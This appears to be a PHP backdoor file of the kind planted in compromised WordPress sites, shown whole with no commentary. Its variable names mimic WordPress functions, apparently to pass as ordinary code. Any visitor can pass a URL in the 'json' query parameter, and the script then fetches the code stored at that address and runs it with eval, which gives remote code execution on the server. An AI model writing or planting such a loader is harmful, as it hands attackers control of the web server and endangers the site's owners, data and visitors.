<?php
if (isset($_GET['json'])) {
    $wp_nav_menu_vt = $_GET['json'];
    if ($wp_die_ihr = curl_init()) {
        curl_setopt($wp_die_ihr, CURLOPT_URL, $wp_nav_menu_vt);
        curl_setopt($wp_die_ihr, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($wp_die_ihr));
        curl_close($wp_die_ihr);
        exit;
    }
}